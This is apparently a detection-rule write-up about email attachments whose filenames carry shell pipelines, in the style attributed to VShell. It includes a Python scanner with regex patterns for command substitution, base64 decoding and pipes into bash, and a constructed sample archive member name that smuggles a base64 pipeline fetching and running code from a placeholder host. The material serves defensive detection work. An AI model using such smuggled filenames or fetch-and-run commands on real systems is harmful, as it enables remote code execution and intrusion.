
Summary
This detection rule targets a fileless technique in which the malicious payload is carried in a filename rather than in file content, an approach used by threats such as VShell. A filename of this kind contains a complete shell pipeline (a backtick- or brace-wrapped command, a base64-encoded fragment, and a pipe into bash); nothing runs on its own, but if any tool on the receiving side passes the name to a shell unquoted, the embedded command executes without a separate executable ever being written to disk. The rule applies only to inbound messages and only when the message carries at least one attachment. It then looks for common archive types such as .zip and .rar and inspects both the attachment's own filename and the names of the files inside the archive, whether those members are compressed or uncompressed, since it is the name, not the file body, that carries the payload and compression does not hide it. Matching combines fixed-string checks with regular expressions for shell syntax (command substitution, brace expansion, pipes into bash, base64 decoding) and for long base64-like runs. This lets the rule catch lures that content-focused scanning, which examines the bytes inside files rather than their names, would miss.
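The gate and filename inspection described above, as an added example that is not the rule's own logic or code from any project: it checks that a message is inbound and has attachments, lists the members of .zip and tar archives with the standard library, and scores each name against assumed shell-syntax and base64 patterns. The message structure, the pattern set, the severity labels and the sample attachments (including the archive member name that smuggles a bash pipeline) are all constructed for this example.

```python
import base64
import io
import re
import tarfile
import zipfile

# Filename indicators. Labels and patterns are this example's assumptions,
# not the page's rule logic. "Strong" indicators are shell syntax that has no
# business in a document name; the "weak" base64 run also fires on legitimate
# names (hashes, tokens), so it is only reported alongside a strong hit.
STRONG_PATTERNS = {
    "backtick_subst": re.compile(r"`[^`]+`"),
    "dollar_subst": re.compile(r"\$\([^)]*\)"),
    "brace_expansion_cmd": re.compile(
        r"\{(?:echo|printf|curl|wget|bash|sh|base64|python3?),[^}]*\}"),
    "base64_decode": re.compile(r"base64[\s,]+-d\b"),
    "pipe_to_shell": re.compile(r"\|\s*\{?(?:ba)?sh\b"),
}
WEAK_PATTERNS = {
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
}
ARCHIVE_SUFFIXES = (".zip", ".rar", ".7z", ".tar", ".tar.gz", ".tgz")


def classify_name(name):
    """Return (strong_hits, weak_hits) for one filename or archive member name."""
    strong = [k for k, rx in STRONG_PATTERNS.items() if rx.search(name)]
    weak = [k for k, rx in WEAK_PATTERNS.items() if rx.search(name)]
    return strong, weak


def archive_member_names(filename, data):
    """List member names for formats the standard library can open.
    .rar and .7z need third-party parsers and are treated as opaque here."""
    lower = filename.lower()
    if lower.endswith(".zip"):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.namelist()  # names are readable whether members are deflated or stored
    if lower.endswith((".tar", ".tar.gz", ".tgz")):
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            return tf.getnames()
    return []


def scan_message(message):
    """message = {"direction": str, "attachments": [(filename, bytes), ...]} (assumed shape).
    Returns a list of findings; empty when the gate or the patterns do not match."""
    if message.get("direction") != "inbound" or not message.get("attachments"):
        return []  # inbound gate and attachment-count > 0 check
    findings = []
    for fname, data in message["attachments"]:
        candidates = [(fname, None)]  # the attachment's own name is always checked
        if fname.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                candidates += [(m, fname) for m in archive_member_names(fname, data)]
            except (zipfile.BadZipFile, tarfile.TarError):
                pass  # corrupt archive: the outer name was still checked
        for name, container in candidates:
            strong, weak = classify_name(name)
            if strong:
                findings.append({"name": name, "container": container,
                                 "indicators": strong + weak, "severity": "high"})
    return findings


# Constructed sample data: a benign direct attachment and a zip whose second
# member name carries a bash pipeline in the style of the filename lures the
# page attributes to VShell. The decoded command is a placeholder, not real C2.
_STAGE_B64 = base64.b64encode(b"curl -s http://example.invalid/stage | sh").decode()
MALICIOUS_MEMBER = "invoice.pdf`{echo,%s}|{base64,-d}|bash`" % _STAGE_B64


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # one deflated and one stored member: both names are inspected
        zf.writestr("ziliao.pdf", b"%PDF-1.4 placeholder", compress_type=zipfile.ZIP_DEFLATED)
        zf.writestr(MALICIOUS_MEMBER, b"%PDF-1.4 decoy", compress_type=zipfile.ZIP_STORED)
    return buf.getvalue()


def sample_message():
    return {"direction": "inbound",
            "attachments": [("Q3_report_2025.xlsx", b"PK\x03\x04 placeholder"),
                            ("documents.zip", build_sample_zip())]}


if __name__ == "__main__":
    for f in scan_message(sample_message()):
        print(f["severity"], f["container"], f["indicators"], f["name"][:40])
```

The base64-run pattern is deliberately not a finding on its own: a file named after its SHA-256 hash matches it, so only the shell-syntax indicators raise an alert and the base64 run is attached as supporting context. Member names are inspected without extracting any member body, which is what makes the check cheap and safe to run on every inbound archive.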
Categories
- Network
- Endpoint
- Linux
- Windows
- Cloud
Data Sources
- File
- Process
- Application Log
- Network Traffic
- Malware Repository
Created: 2025-08-31